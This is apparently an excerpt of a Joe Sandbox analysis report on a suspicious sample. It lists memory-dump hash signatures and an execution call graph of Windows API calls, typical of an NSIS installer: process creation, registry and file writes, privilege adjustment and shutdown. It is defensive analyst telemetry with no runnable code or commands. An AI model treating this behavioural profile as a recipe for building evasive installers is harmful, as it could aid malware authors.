                                                                                                                                              • Opcode ID: efd8b52f263bd0b79b9159f8e3ccee85c62f36400fca8a2af23dd56063560ee9
                                                                                                                                              • Instruction ID: 50174a8913ffdc3178e2ef5f025d962c01dd53692df617725e6b3d5a1de7f790
                                                                                                                                              • Opcode Fuzzy Hash: efd8b52f263bd0b79b9159f8e3ccee85c62f36400fca8a2af23dd56063560ee9
                                                                                                                                              • Instruction Fuzzy Hash: EFD01778B083098F8704EFA4EA4A86EBFB5EB44200F004169EA0A93350EA306852CBC1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5d1d48b80de235a3255ec7ce6d6d1ae81cf694a87cd26b460c8f5984485f27d7
                                                                                                                                              • Instruction ID: a80bf83d2c0895e7bf517313d78af422364fd7477e1587469d6f75a9f8efa0a0
                                                                                                                                              • Opcode Fuzzy Hash: 5d1d48b80de235a3255ec7ce6d6d1ae81cf694a87cd26b460c8f5984485f27d7
                                                                                                                                              • Instruction Fuzzy Hash: 30D01778A4410DDBCB08BBA4FA1A4BDBB34FB00301F4011ADE91792192EE242A5ACAD1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16c0c3e7a22e868e30d32ea08932b7d8dd3bbbd07ff4c3eed243029032369902
                                                                                                                                              • Instruction ID: 5987b6d54930d0cae816783b4ceba15de3806ce5643eb43fddefa810eb5a8ced
                                                                                                                                              • Opcode Fuzzy Hash: 16c0c3e7a22e868e30d32ea08932b7d8dd3bbbd07ff4c3eed243029032369902
                                                                                                                                              • Instruction Fuzzy Hash: E6D09239B40218CFDB04CBA8E994ADCB371FF88365F208569E6159B251CB32ED22CB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 15c011b134c87fc5980b0a095d7f9cd246baa4d2831d54acbf9031f223c696fd
                                                                                                                                              • Instruction ID: e7ae56bb1ae64ebb493affb1f94f1cfdbd3d3ea56a854b9f03a0fbe95db93fb5
                                                                                                                                              • Opcode Fuzzy Hash: 15c011b134c87fc5980b0a095d7f9cd246baa4d2831d54acbf9031f223c696fd
                                                                                                                                              • Instruction Fuzzy Hash: 64C04C1160A3C15FDF1357358DD4EC63FB35E8362130A45D29062CF823CA28984AD311
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000019.00000002.1986803132.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_25_2_48a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e0db95d4736dc09f1fd7e09bfea9cd2d284d644be0aa68d922399d1221a23b50
                                                                                                                                              • Instruction ID: 389d400912d1c27ec3fa732283e94f38e89e2085df141e59a6769e68b2633d81
                                                                                                                                              • Opcode Fuzzy Hash: e0db95d4736dc09f1fd7e09bfea9cd2d284d644be0aa68d922399d1221a23b50
                                                                                                                                              • Instruction Fuzzy Hash: 9EB09234084B088FC248AFB9B40882877A9AA4860538104ADE50A0A2928F36E880CE64

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:16.2%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:1380
                                                                                                                                              Total number of Limit Nodes:23
                                                                                                                                              execution_graph 3249 401bc0 3250 401c11 3249->3250 3251 401bcd 3249->3251 3252 401c16 3250->3252 3253 401c3b GlobalAlloc 3250->3253 3254 4023af 3251->3254 3259 401be4 3251->3259 3262 401c56 3252->3262 3268 4066a2 lstrcpynW 3252->3268 3269 4066df 3253->3269 3256 4066df 21 API calls 3254->3256 3258 4023bc 3256->3258 3288 405d02 3258->3288 3286 4066a2 lstrcpynW 3259->3286 3260 401c28 GlobalFree 3260->3262 3264 401bf3 3287 4066a2 lstrcpynW 3264->3287 3266 401c02 3292 4066a2 lstrcpynW 3266->3292 3268->3260 3270 4066ea 3269->3270 3271 406931 3270->3271 3274 406902 lstrlenW 3270->3274 3277 4067fb GetSystemDirectoryW 3270->3277 3278 4066df 15 API calls 3270->3278 3280 406811 GetWindowsDirectoryW 3270->3280 3281 4066df 15 API calls 3270->3281 3282 4068a3 lstrcatW 3270->3282 3285 406873 SHGetPathFromIDListW CoTaskMemFree 3270->3285 3293 406570 3270->3293 3298 406a96 GetModuleHandleA 3270->3298 3304 406950 3270->3304 3313 4065e9 wsprintfW 3270->3313 3314 4066a2 lstrcpynW 3270->3314 3272 40694a 3271->3272 3315 4066a2 lstrcpynW 3271->3315 3272->3262 3274->3270 3277->3270 3278->3274 3280->3270 3281->3270 3282->3270 3285->3270 3286->3264 3287->3266 3289 405d17 3288->3289 3290 405d63 3289->3290 3291 405d2b MessageBoxIndirectW 3289->3291 3290->3262 3291->3290 3292->3262 3316 40650f 3293->3316 3296 4065a4 RegQueryValueExW RegCloseKey 3297 4065d4 3296->3297 3297->3270 3299 406ab2 3298->3299 3300 406abc GetProcAddress 3298->3300 3320 406a26 GetSystemDirectoryW 3299->3320 3303 406acb 3300->3303 3302 406ab8 3302->3300 3302->3303 3303->3270 3311 40695d 3304->3311 3305 4069d3 3306 4069d8 CharPrevW 3305->3306 3309 4069f9 3305->3309 3306->3305 3307 4069c6 CharNextW 3307->3305 3307->3311 3309->3270 3310 4069b2 CharNextW 3310->3311 3311->3305 3311->3307 3311->3310 3312 4069c1 CharNextW 3311->3312 3323 405f9e 3311->3323 3312->3307 3313->3270 3314->3270 3315->3272 3317 40651e 3316->3317 3318 406522 3317->3318 3319 406527 RegOpenKeyExW 3317->3319 3318->3296 3318->3297 3319->3318 3321 406a48 wsprintfW LoadLibraryExW 3320->3321 3321->3302 3324 405fa4 3323->3324 3325 405fba 3324->3325 3326 405fab CharNextW 3324->3326 3325->3311 3326->3324 3928 406dc0 3930 406c44 3928->3930 3929 4075af 3930->3929 3931 406cc5 GlobalFree 3930->3931 3932 406cce GlobalAlloc 3930->3932 3933 406d45 GlobalAlloc 3930->3933 3934 406d3c GlobalFree 3930->3934 3931->3932 3932->3929 3932->3930 3933->3929 3933->3930 3934->3933 3935 402641 3936 402dcb 21 API calls 3935->3936 3937 402648 3936->3937 3940 406192 GetFileAttributesW CreateFileW 3937->3940 3939 402654 3940->3939 3941 4025c3 3942 402e0b 21 API calls 3941->3942 3943 4025cd 3942->3943 3951 402da9 3943->3951 3945 4025d6 3946 4025f2 RegEnumKeyW 3945->3946 3947 4025fe RegEnumValueW 3945->3947 3948 402953 3945->3948 3949 402613 RegCloseKey 3946->3949 3947->3949 3949->3948 3952 4066df 21 API calls 3951->3952 3953 402dbe 3952->3953 3953->3945 3954 4015c8 3955 402dcb 21 API calls 3954->3955 3956 4015cf SetFileAttributesW 3955->3956 3957 4015e1 3956->3957 3860 401fc9 3861 402dcb 21 API calls 3860->3861 3862 401fcf 3861->3862 3863 405727 28 API calls 3862->3863 3864 401fd9 3863->3864 3865 405c85 2 API calls 3864->3865 3866 401fdf 3865->3866 3867 402002 CloseHandle 3866->3867 3870 402953 3866->3870 3875 406b41 WaitForSingleObject 3866->3875 3867->3870 3871 401ff4 3872 402004 3871->3872 3873 401ff9 3871->3873 3872->3867 3880 4065e9 wsprintfW 3873->3880 3876 406b5b 3875->3876 3877 406b6d GetExitCodeProcess 3876->3877 3878 406ad2 2 API calls 3876->3878 3877->3871 3879 406b62 WaitForSingleObject 3878->3879 3879->3876 3880->3867 3965 404acb 3966 404b01 3965->3966 3967 404adb 3965->3967 3975 404688 3966->3975 3972 404621 3967->3972 3970 404ae8 SetDlgItemTextW 3970->3966 3973 4066df 21 API calls 3972->3973 3974 40462c SetDlgItemTextW 3973->3974 3974->3970 3976 4046a0 GetWindowLongW 3975->3976 3977 40474b 3975->3977 3976->3977 3978 4046b5 3976->3978 3978->3977 3979 4046e2 GetSysColor 3978->3979 3980 4046e5 3978->3980 3979->3980 3981 4046f5 SetBkMode 3980->3981 3982 4046eb SetTextColor 3980->3982 3983 404713 3981->3983 3984 40470d GetSysColor 3981->3984 3982->3981 3985 404724 3983->3985 3986 40471a SetBkColor 3983->3986 3984->3983 3985->3977 3987 404737 DeleteObject 3985->3987 3988 40473e CreateBrushIndirect 3985->3988 3986->3985 3987->3988 3988->3977 3911 40254f 3922 402e0b 3911->3922 3914 402dcb 21 API calls 3915 402562 3914->3915 3916 40256d RegQueryValueExW 3915->3916 3918 402953 3915->3918 3917 40258d 3916->3917 3921 402593 RegCloseKey 3916->3921 3917->3921 3927 4065e9 wsprintfW 3917->3927 3921->3918 3923 402dcb 21 API calls 3922->3923 3924 402e22 3923->3924 3925 40650f RegOpenKeyExW 3924->3925 3926 402559 3925->3926 3926->3914 3927->3921 3992 40204f 3993 402dcb 21 API calls 3992->3993 3994 402056 3993->3994 3995 406a96 5 API calls 3994->3995 3996 402065 3995->3996 3997 402081 GlobalAlloc 3996->3997 3999 4020f1 3996->3999 3998 402095 3997->3998 3997->3999 4000 406a96 5 API calls 3998->4000 4001 40209c 4000->4001 4002 406a96 5 API calls 4001->4002 4003 4020a6 4002->4003 4003->3999 4007 4065e9 wsprintfW 4003->4007 4005 4020df 4008 4065e9 wsprintfW 4005->4008 4007->4005 4008->3999 4009 4021cf 4010 402dcb 21 API calls 4009->4010 4011 4021d6 4010->4011 4012 402dcb 21 API calls 4011->4012 4013 4021e0 4012->4013 4014 402dcb 21 API calls 4013->4014 4015 4021ea 4014->4015 4016 402dcb 21 API calls 4015->4016 4017 4021f4 4016->4017 4018 402dcb 21 API calls 4017->4018 4019 4021fe 4018->4019 4020 40223d CoCreateInstance 4019->4020 4021 402dcb 21 API calls 4019->4021 4024 40225c 4020->4024 4021->4020 4022 401423 28 API calls 4023 40231b 4022->4023 4024->4022 4024->4023 4025 401a55 4026 402dcb 21 API calls 4025->4026 4027 401a5e ExpandEnvironmentStringsW 4026->4027 4028 401a72 4027->4028 4030 401a85 4027->4030 4029 401a77 lstrcmpW 4028->4029 4028->4030 4029->4030 4031 404757 lstrcpynW lstrlenW 4032 4014d7 4033 402da9 21 API calls 4032->4033 4034 4014dd Sleep 4033->4034 4036 402c4f 4034->4036 4042 4023d7 4043 4023e5 4042->4043 4044 4023df 4042->4044 4046 4023f3 4043->4046 4047 402dcb 21 API calls 4043->4047 4045 402dcb 21 API calls 4044->4045 4045->4043 4048 402dcb 21 API calls 4046->4048 4050 402401 4046->4050 4047->4046 4048->4050 4049 402dcb 21 API calls 4051 40240a WritePrivateProfileStringW 4049->4051 4050->4049 4052 402459 4053 402461 4052->4053 4054 40248c 4052->4054 4056 402e0b 21 API calls 4053->4056 4055 402dcb 21 API calls 4054->4055 4057 402493 4055->4057 4058 402468 4056->4058 4063 402e89 4057->4063 4060 4024a0 4058->4060 4061 402dcb 21 API calls 4058->4061 4062 402479 RegDeleteValueW RegCloseKey 4061->4062 4062->4060 4064 402e9d 4063->4064 4065 402e96 4063->4065 4064->4065 4067 402ece 4064->4067 4065->4060 4068 40650f RegOpenKeyExW 4067->4068 4069 402efc 4068->4069 4070 402f0c RegEnumValueW 4069->4070 4077 402f2f 4069->4077 4078 402fa6 4069->4078 4071 402f96 RegCloseKey 4070->4071 4070->4077 4071->4078 4072 402f6b RegEnumKeyW 4073 402f74 RegCloseKey 4072->4073 4072->4077 4074 406a96 5 API calls 4073->4074 4076 402f84 4074->4076 4075 402ece 6 API calls 4075->4077 4076->4078 4079 402f88 RegDeleteKeyW 4076->4079 4077->4071 4077->4072 4077->4073 4077->4075 4078->4065 4079->4078 4080 40175a 4081 402dcb 21 API calls 4080->4081 4082 401761 SearchPathW 4081->4082 4083 40177c 4082->4083 4084 401d5d 4085 402da9 21 API calls 4084->4085 4086 401d64 4085->4086 4087 402da9 21 API calls 4086->4087 4088 401d70 GetDlgItem 4087->4088 4089 40265d 4088->4089 4097 4047e0 4099 404912 4097->4099 4101 4047f8 4097->4101 4098 40497c 4100 404a46 4098->4100 4102 404986 GetDlgItem 4098->4102 4099->4098 4099->4100 4106 40494d GetDlgItem SendMessageW 4099->4106 4108 404688 8 API calls 4100->4108 4103 404621 22 API calls 4101->4103 4104 4049a0 4102->4104 4105 404a07 4102->4105 4107 40485f 4103->4107 4104->4105 4113 4049c6 SendMessageW LoadCursorW SetCursor 4104->4113 4105->4100 4109 404a19 4105->4109 4130 404643 EnableWindow 4106->4130 4111 404621 22 API calls 4107->4111 4112 404a41 4108->4112 4114 404a2f 4109->4114 4115 404a1f SendMessageW 4109->4115 4117 40486c CheckDlgButton 4111->4117 4134 404a8f 4113->4134 4114->4112 4119 404a35 SendMessageW 4114->4119 4115->4114 4116 404977 4131 404a6b 4116->4131 4128 404643 EnableWindow 4117->4128 4119->4112 4123 40488a GetDlgItem 4129 404656 SendMessageW 4123->4129 4125 4048a0 SendMessageW 4126 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4125->4126 4127 4048bd GetSysColor 4125->4127 4126->4112 4127->4126 4128->4123 4129->4125 4130->4116 4132 404a79 4131->4132 4133 404a7e SendMessageW 4131->4133 4132->4133 4133->4098 4137 405cc8 ShellExecuteExW 4134->4137 4136 4049f5 LoadCursorW SetCursor 4136->4105 4137->4136 4138 402663 4139 402692 4138->4139 4140 402677 4138->4140 4142 4026c2 4139->4142 4143 402697 4139->4143 4141 402da9 21 API calls 4140->4141 4153 40267e 4141->4153 4145 402dcb 21 API calls 4142->4145 4144 402dcb 21 API calls 4143->4144 4146 40269e 4144->4146 4147 4026c9 lstrlenW 4145->4147 4155 4066c4 WideCharToMultiByte 4146->4155 4147->4153 4149 4026b2 lstrlenA 4149->4153 4150 40270c 4151 4026f6 4151->4150 4152 406244 WriteFile 4151->4152 4152->4150 4153->4150 4153->4151 4156 406273 SetFilePointer 4153->4156 4155->4149 4157 40628f 4156->4157 4164 4062a7 4156->4164 4158 406215 ReadFile 4157->4158 4159 40629b 4158->4159 4160 4062b0 SetFilePointer 4159->4160 4161 4062d8 SetFilePointer 4159->4161 4159->4164 4160->4161 4162 4062bb 4160->4162 4161->4164 4163 406244 WriteFile 4162->4163 4163->4164 4164->4151 3591 403665 SetErrorMode GetVersionExW 3592 4036f1 3591->3592 3593 4036b9 GetVersionExW 3591->3593 3594 403748 3592->3594 3595 406a96 5 API calls 3592->3595 3593->3592 3596 406a26 3 API calls 3594->3596 3595->3594 3597 40375e lstrlenA 3596->3597 3597->3594 3598 40376e 3597->3598 3599 406a96 5 API calls 3598->3599 3600 403775 3599->3600 3601 406a96 5 API calls 3600->3601 3602 40377c 3601->3602 3603 406a96 5 API calls 3602->3603 3604 403788 #17 OleInitialize SHGetFileInfoW 3603->3604 3679 4066a2 lstrcpynW 3604->3679 3607 4037d7 GetCommandLineW 3680 4066a2 lstrcpynW 3607->3680 3609 4037e9 3610 405f9e CharNextW 3609->3610 3611 40380f CharNextW 3610->3611 3621 403821 3611->3621 3612 403923 3613 403937 GetTempPathW 3612->3613 3681 403634 3613->3681 3615 40394f 3616 403953 GetWindowsDirectoryW lstrcatW 3615->3616 3617 4039a9 DeleteFileW 3615->3617 3619 403634 12 API calls 3616->3619 3691 4030f5 GetTickCount GetModuleFileNameW 3617->3691 3618 405f9e CharNextW 3618->3621 3622 40396f 3619->3622 3621->3612 3621->3618 3625 403925 3621->3625 3622->3617 3624 403973 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3622->3624 3623 4039bd 3626 403bb0 ExitProcess CoUninitialize 3623->3626 3633 405f9e CharNextW 3623->3633 3662 403a64 3623->3662 3627 403634 12 API calls 3624->3627 3778 4066a2 lstrcpynW 3625->3778 3628 403bc2 3626->3628 3629 403be6 3626->3629 3631 4039a1 3627->3631 3632 405d02 MessageBoxIndirectW 3628->3632 3634 403c6a ExitProcess 3629->3634 3635 403bee GetCurrentProcess OpenProcessToken 3629->3635 3631->3617 3631->3626 3638 403bd0 ExitProcess 3632->3638 3643 4039dc 3633->3643 3639 403c06 LookupPrivilegeValueW AdjustTokenPrivileges 3635->3639 3640 403c3a 3635->3640 3639->3640 3642 406a96 5 API calls 3640->3642 3653 403c41 3642->3653 3644 403a3a 3643->3644 3645 403a7d 3643->3645 3648 406079 18 API calls 3644->3648 3781 405c6d 3645->3781 3647 403c56 ExitWindowsEx 3647->3634 3650 403c63 3647->3650 3651 403a46 3648->3651 3795 40140b 3650->3795 3651->3626 3779 4066a2 lstrcpynW 3651->3779 3653->3647 3653->3650 3655 403a9c 3657 403ab4 3655->3657 3785 4066a2 lstrcpynW 3655->3785 3661 403ada wsprintfW 3657->3661 3676 403b06 3657->3676 3658 403a59 3780 4066a2 lstrcpynW 3658->3780 3663 4066df 21 API calls 3661->3663 3721 403d74 3662->3721 3663->3657 3666 403b50 SetCurrentDirectoryW 3669 406462 40 API calls 3666->3669 3667 403b16 GetFileAttributesW 3668 403b22 DeleteFileW 3667->3668 3667->3676 3668->3676 3671 403b5f CopyFileW 3669->3671 3670 403b4e 3670->3626 3671->3670 3671->3676 3672 405dae 71 API calls 3672->3676 3673 406462 40 API calls 3673->3676 3674 4066df 21 API calls 3674->3676 3676->3657 3676->3661 3676->3666 3676->3667 3676->3670 3676->3672 3676->3673 3676->3674 3677 403bd8 CloseHandle 3676->3677 3678 4069ff 2 API calls 3676->3678 3786 405bf6 CreateDirectoryW 3676->3786 3789 405c50 CreateDirectoryW 3676->3789 3792 405c85 CreateProcessW 3676->3792 3677->3670 3678->3676 3679->3607 3680->3609 3682 406950 5 API calls 3681->3682 3684 403640 3682->3684 3683 40364a 3683->3615 3684->3683 3685 405f71 3 API calls 3684->3685 3686 403652 3685->3686 3687 405c50 2 API calls 3686->3687 3688 403658 3687->3688 3689 4061c1 2 API calls 3688->3689 3690 403663 3689->3690 3690->3615 3798 406192 GetFileAttributesW CreateFileW 3691->3798 3693 403138 3720 403145 3693->3720 3799 4066a2 lstrcpynW 3693->3799 3695 40315b 3696 405fbd 2 API calls 3695->3696 3697 403161 3696->3697 3800 4066a2 lstrcpynW 3697->3800 3699 40316c GetFileSize 3700 403266 3699->3700 3719 403183 3699->3719 3701 403053 36 API calls 3700->3701 3702 40326f 3701->3702 3704 4032ab GlobalAlloc 3702->3704 3702->3720 3802 40361d SetFilePointer 3702->3802 3703 403607 ReadFile 3703->3719 3706 4032c2 3704->3706 3705 403303 3708 403053 36 API calls 3705->3708 3710 4061c1 2 API calls 3706->3710 3708->3720 3709 40328c 3711 403607 ReadFile 3709->3711 3714 4032d3 CreateFileW 3710->3714 3713 403297 3711->3713 3712 403053 36 API calls 3712->3719 3713->3704 3713->3720 3715 40330d 3714->3715 3714->3720 3801 40361d SetFilePointer 3715->3801 3717 40331b 3718 403396 48 API calls 3717->3718 3718->3720 3719->3700 3719->3703 3719->3705 3719->3712 3719->3720 3720->3623 3722 406a96 5 API calls 3721->3722 3723 403d88 3722->3723 3724 403da0 3723->3724 3725 403d8e 3723->3725 3726 406570 3 API calls 3724->3726 3811 4065e9 wsprintfW 3725->3811 3727 403dd0 3726->3727 3729 403def lstrcatW 3727->3729 3731 406570 3 API calls 3727->3731 3730 403d9e 3729->3730 3803 40404a 3730->3803 3731->3729 3734 406079 18 API calls 3735 403e21 3734->3735 3736 403eb5 3735->3736 3738 406570 3 API calls 3735->3738 3737 406079 18 API calls 3736->3737 3739 403ebb 3737->3739 3745 403e53 3738->3745 3740 403ecb LoadImageW 3739->3740 3741 4066df 21 API calls 3739->3741 3742 403f71 3740->3742 3743 403ef2 RegisterClassW 3740->3743 3741->3740 3747 40140b 2 API calls 3742->3747 3746 403f28 SystemParametersInfoW CreateWindowExW 3743->3746 3776 403a74 3743->3776 3744 403e74 lstrlenW 3749 403e82 lstrcmpiW 3744->3749 3750 403ea8 3744->3750 3745->3736 3745->3744 3748 405f9e CharNextW 3745->3748 3746->3742 3751 403f77 3747->3751 3753 403e71 3748->3753 3749->3750 3754 403e92 GetFileAttributesW 3749->3754 3752 405f71 3 API calls 3750->3752 3755 40404a 22 API calls 3751->3755 3751->3776 3756 403eae 3752->3756 3753->3744 3757 403e9e 3754->3757 3759 403f88 3755->3759 3812 4066a2 lstrcpynW 3756->3812 3757->3750 3758 405fbd 2 API calls 3757->3758 3758->3750 3761 403f94 ShowWindow 3759->3761 3762 404017 3759->3762 3764 406a26 3 API calls 3761->3764 3813 4057fa OleInitialize 3762->3813 3766 403fac 3764->3766 3765 40401d 3767 404021 3765->3767 3768 404039 3765->3768 3769 403fba GetClassInfoW 3766->3769 3771 406a26 3 API calls 3766->3771 3774 40140b 2 API calls 3767->3774 3767->3776 3770 40140b 2 API calls 3768->3770 3772 403fe4 DialogBoxParamW 3769->3772 3773 403fce GetClassInfoW RegisterClassW 3769->3773 3770->3776 3771->3769 3775 40140b 2 API calls 3772->3775 3773->3772 3774->3776 3777 40400c 3775->3777 3776->3626 3777->3776 3778->3613 3779->3658 3780->3662 3782 406a96 5 API calls 3781->3782 3783 403a82 lstrlenW 3782->3783 3784 4066a2 lstrcpynW 3783->3784 3784->3655 3785->3657 3787 405c42 3786->3787 3788 405c46 GetLastError 3786->3788 3787->3676 3788->3787 3790 405c60 3789->3790 3791 405c64 GetLastError 3789->3791 3790->3676 3791->3790 3793 405cc4 3792->3793 3794 405cb8 CloseHandle 3792->3794 3793->3676 3794->3793 3796 401389 2 API calls 3795->3796 3797 401420 3796->3797 3797->3634 3798->3693 3799->3695 3800->3699 3801->3717 3802->3709 3804 40405e 3803->3804 3820 4065e9 wsprintfW 3804->3820 3806 4040cf 3821 404103 3806->3821 3808 403dff 3808->3734 3809 4040d4 3809->3808 3810 4066df 21 API calls 3809->3810 3810->3809 3811->3730 3812->3736 3824 40466d 3813->3824 3815 40581d 3819 405844 3815->3819 3827 401389 3815->3827 3816 40466d SendMessageW 3817 405856 OleUninitialize 3816->3817 3817->3765 3819->3816 3820->3806 3822 4066df 21 API calls 3821->3822 3823 404111 SetWindowTextW 3822->3823 3823->3809 3825 404685 3824->3825 3826 404676 SendMessageW 3824->3826 3825->3815 3826->3825 3829 401390 3827->3829 3828 4013fe 3828->3815 3829->3828 3830 4013cb MulDiv SendMessageW 3829->3830 3830->3829 3831 4015e6 3832 402dcb 21 API calls 3831->3832 3833 4015ed 3832->3833 3834 40601c 4 API calls 3833->3834 3835 4015f6 3834->3835 3836 401656 3835->3836 3837 405f9e CharNextW 3835->3837 3844 405c50 2 API calls 3835->3844 3845 405c6d 5 API calls 3835->3845 3848 40163c GetFileAttributesW 3835->3848 3849 405bf6 2 API calls 3835->3849 3838 401688 3836->3838 3839 40165b 3836->3839 3837->3835 3841 401423 28 API calls 3838->3841 3850 401423 3839->3850 3847 401680 3841->3847 3844->3835 3845->3835 3846 40166f SetCurrentDirectoryW 3846->3847 3848->3835 3849->3835 3851 405727 28 API calls 3850->3851 3852 401431 3851->3852 3853 4066a2 lstrcpynW 3852->3853 3853->3846 4165 405866 4166 405a10 4165->4166 4167 405887 GetDlgItem GetDlgItem GetDlgItem 4165->4167 4169 405a41 4166->4169 4170 405a19 GetDlgItem CreateThread CloseHandle 4166->4170 4210 404656 SendMessageW 4167->4210 4172 405a6c 4169->4172 4174 405a91 4169->4174 4175 405a58 ShowWindow ShowWindow 4169->4175 4170->4169 4171 4058f7 4179 4058fe GetClientRect GetSystemMetrics SendMessageW SendMessageW 4171->4179 4173 405acc 4172->4173 4176 405a80 4172->4176 4177 405aa6 ShowWindow 4172->4177 4173->4174 4187 405ada SendMessageW 4173->4187 4178 404688 8 API calls 4174->4178 4212 404656 SendMessageW 4175->4212 4213 4045fa 4176->4213 4183 405ac6 4177->4183 4184 405ab8 4177->4184 4182 405a9f 4178->4182 4185 405950 SendMessageW SendMessageW 4179->4185 4186 40596c 4179->4186 4189 4045fa SendMessageW 4183->4189 4188 405727 28 API calls 4184->4188 4185->4186 4190 405971 SendMessageW 4186->4190 4191 40597f 4186->4191 4187->4182 4192 405af3 CreatePopupMenu 4187->4192 4188->4183 4189->4173 4190->4191 4194 404621 22 API calls 4191->4194 4193 4066df 21 API calls 4192->4193 4195 405b03 AppendMenuW 4193->4195 4196 40598f 4194->4196 4197 405b20 GetWindowRect 4195->4197 4198 405b33 TrackPopupMenu 4195->4198 4199 405998 ShowWindow 4196->4199 4200 4059cc GetDlgItem SendMessageW 4196->4200 4197->4198 4198->4182 4201 405b4e 4198->4201 4202 4059bb 4199->4202 4203 4059ae ShowWindow 4199->4203 4200->4182 4204 4059f3 SendMessageW SendMessageW 4200->4204 4205 405b6a SendMessageW 4201->4205 4211 404656 SendMessageW 4202->4211 4203->4202 4204->4182 4205->4205 4206 405b87 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4205->4206 4208 405bac SendMessageW 4206->4208 4208->4208 4209 405bd5 GlobalUnlock SetClipboardData CloseClipboard 4208->4209 4209->4182 4210->4171 4211->4200 4212->4172 4214 404601 4213->4214 4215 404607 SendMessageW 4213->4215 4214->4215 4215->4174 4216 404e68 4217 404e94 4216->4217 4218 404e78 4216->4218 4220 404ec7 4217->4220 4221 404e9a SHGetPathFromIDListW 4217->4221 4227 405ce6 GetDlgItemTextW 4218->4227 4223 404eb1 SendMessageW 4221->4223 4224 404eaa 4221->4224 4222 404e85 SendMessageW 4222->4217 4223->4220 4225 40140b 2 API calls 4224->4225 4225->4223 4227->4222 4228 401c68 4229 402da9 21 API calls 4228->4229 4230 401c6f 4229->4230 4231 402da9 21 API calls 4230->4231 4232 401c7c 4231->4232 4233 401c91 4232->4233 4234 402dcb 21 API calls 4232->4234 4235 401ca1 4233->4235 4236 402dcb 21 API calls 4233->4236 4234->4233 4237 401cf8 4235->4237 4238 401cac 4235->4238 4236->4235 4239 402dcb 21 API calls 4237->4239 4240 402da9 21 API calls 4238->4240 4241 401cfd 4239->4241 4242 401cb1 4240->4242 4243 402dcb 21 API calls 4241->4243 4244 402da9 21 API calls 4242->4244 4245 401d06 FindWindowExW 4243->4245 4246 401cbd 4244->4246 4249 401d28 4245->4249 4247 401ce8 SendMessageW 4246->4247 4248 401cca SendMessageTimeoutW 4246->4248 4247->4249 4248->4249 4250 4028e9 4251 4028ef 4250->4251 4252 4028f7 FindClose 4251->4252 4253 402c4f 4251->4253 4252->4253 4254 4016f1 4255 402dcb 21 API calls 4254->4255 4256 4016f7 GetFullPathNameW 4255->4256 4257 401711 4256->4257 4263 401733 4256->4263 4260 4069ff 2 API calls 4257->4260 4257->4263 4258 401748 GetShortPathNameW 4259 402c4f 4258->4259 4261 401723 4260->4261 4261->4263 4264 4066a2 lstrcpynW 4261->4264 4263->4258 4263->4259 4264->4263 4265 401e73 GetDC 4266 402da9 21 API calls 4265->4266 4267 401e85 GetDeviceCaps MulDiv ReleaseDC 4266->4267 4268 402da9 21 API calls 4267->4268 4269 401eb6 4268->4269 4270 4066df 21 API calls 4269->4270 4271 401ef3 CreateFontIndirectW 4270->4271 4272 40265d 4271->4272 4273 402975 4274 402dcb 21 API calls 4273->4274 4275 402981 4274->4275 4276 402997 4275->4276 4277 402dcb 21 API calls 4275->4277 4278 40616d 2 API calls 4276->4278 4277->4276 4279 40299d 4278->4279 4301 406192 GetFileAttributesW CreateFileW 4279->4301 4281 4029aa 4282 402a60 4281->4282 4283 4029c5 GlobalAlloc 4281->4283 4284 402a48 4281->4284 4285 402a67 DeleteFileW 4282->4285 4286 402a7a 4282->4286 4283->4284 4287 4029de 4283->4287 4288 403396 48 API calls 4284->4288 4285->4286 4302 40361d SetFilePointer 4287->4302 4290 402a55 CloseHandle 4288->4290 4290->4282 4291 4029e4 4292 403607 ReadFile 4291->4292 4293 4029ed GlobalAlloc 4292->4293 4294 402a31 4293->4294 4295 4029fd 4293->4295 4296 406244 WriteFile 4294->4296 4297 403396 48 API calls 4295->4297 4298 402a3d GlobalFree 4296->4298 4300 402a0a 4297->4300 4298->4284 4299 402a28 GlobalFree 4299->4294 4300->4299 4301->4281 4302->4291 4303 4014f5 SetForegroundWindow 4304 402c4f 4303->4304 4319 40197b 4320 402dcb 21 API calls 4319->4320 4321 401982 lstrlenW 4320->4321 4322 40265d 4321->4322 3885 4020fd 3886 4021c1 3885->3886 3887 40210f 3885->3887 3889 401423 28 API calls 3886->3889 3888 402dcb 21 API calls 3887->3888 3890 402116 3888->3890 3895 40231b 3889->3895 3891 402dcb 21 API calls 3890->3891 3892 40211f 3891->3892 3893 402135 LoadLibraryExW 3892->3893 3894 402127 GetModuleHandleW 3892->3894 3893->3886 3896 402146 3893->3896 3894->3893 3894->3896 3905 406b05 3896->3905 3899 402190 